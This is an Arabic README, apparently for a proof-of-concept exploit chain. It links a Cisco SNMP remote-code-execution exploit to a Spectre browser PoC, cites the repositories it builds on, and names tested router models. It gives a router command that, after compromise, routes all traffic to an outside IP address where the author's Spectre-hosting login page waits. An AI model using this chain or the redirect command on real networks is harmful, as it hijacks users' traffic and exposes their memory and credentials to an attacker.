
استغلال تسلسل POC باستخدام ثغرة Cisco SMP الحديثة (CVE-2017-6736) للتسلسل إلى Spectre (CVE-2017-5753 و CVE-2017-5715)
سلسلة استغلال PoC تستخدم استغلال SMP الأخير من سيسكو (CVE-2017-6736) للتسلسل إلى Spectre (CVE-2017-5753 و CVE-2017-5715)
الوحدة الفرعية لاستغلال RCE من سيسكو بواسطة artkond: https://github.com/artkond/cisco-snmp-rce
POC لـ JS Spectre Chrome بواسطة ascendr: https://github.com/ascendr/spectre-chrome
تم اختباره على جهاز توجيه Cisco 1841+2600.
بعد تشغيل استغلال RCE. كتكوين، قم بتشغيل:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
سيؤدي هذا إلى توجيه كل حركة المرور عبر صفحة تسجيل الدخول الخاصة بـ Spectre التي أنشأتها. في وقت لاحق، سأضيف نسخة أفضل تعالج الوصول الفعلي إلى مواقع الويب.